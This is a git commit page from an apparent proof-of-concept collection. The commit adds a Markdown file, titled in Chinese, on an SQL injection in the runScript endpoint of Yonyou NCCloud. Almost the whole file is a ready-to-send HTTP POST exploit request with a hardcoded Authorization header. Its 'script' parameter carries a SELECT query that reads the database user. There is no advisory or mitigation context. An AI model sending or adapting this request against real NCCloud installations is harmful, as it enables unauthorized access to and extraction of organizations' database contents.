admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create 用友NCCloud系统runScript存在SQL注入漏洞.md

Browse Source
This commit is contained in:
wy876 2024-03-21 18:00:33 +08:00 committed by GitHub
parent 79a46abf4f
commit d87c6726a5
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 18 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
用友NCCloud系统runScript存在SQL注入漏洞.md Normal file
View File

@ -0,0 +1,18 @@
## 用友NCCloud系统runScript存在SQL注入漏洞
## poc
```
POST /ncchr/attendScript/internal/runScript HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Content-Length: 59
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Authorization: 58e00466213416018d01d15de83b0198
Connection: close
Content-Type: application/x-www-form-urlencoded
key=1&script=select 1,111*111,USER,4,5,6,7,8,9,10 from dual
```